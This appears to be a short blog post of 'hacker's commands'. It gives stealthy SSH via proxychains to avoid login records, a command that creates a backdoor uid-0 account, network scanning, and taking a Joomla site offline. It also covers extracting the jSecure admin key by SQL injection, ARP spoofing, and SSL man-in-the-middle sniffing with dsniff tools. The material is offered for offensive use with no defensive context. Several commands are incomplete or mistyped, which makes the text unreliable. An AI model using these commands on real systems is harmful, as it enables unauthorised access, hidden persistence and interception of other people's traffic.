Posts Tagged ‘Hack’
Linux Hacker’s Command
SSH to remote server
proxychains ssh -T login_name@Remote_IP /bin/bash -i
Use proxychains, so our IP would not be shown there. And use -T so w, who, last, lastlog will not show our account.
Create a user with root privileges
useradd -g 0 -G root,bin,daemon,sys,adm,disk,wheel -M -o -u 0 -p
Reveal subnet mathines
nmap -v -sP 192.168.0.0/24
Joomla Hacker’s command
Set the site offline
sed -i -e "s/offline = '0'/offline = '1'/" /path/to/configuration.php
Find the weak code in Joomla 1.5 for SQL injection
grep 'JRequest::getInt([^,]*,[^,]*);’ . -r
Hack Joomla jSecure Key
jSecure is a Joomla plugin which will prevents access to administration login page without appropriate access key.
Use this SQL in SQL injection can got the access key:
SELECT params FROM jos_plugins WHERE name="jsecure"
And then use the key to access administrator:
http://www.site name/administrator/?keyname
Hack using dsniff
ARP spoofing
1. turn on packet forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. fool target we are gateway
arpspoof -t target_ip gateway_ip
3. fool gateway we are target
arpspoof -t gateway_id target_ip
4. watch the traffic of target:
tcpdump host target_ip and not arp
SSL sniffing
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t
webmitm -d
./ssldump -n -d -k webmitm.crt | tee ssldump.log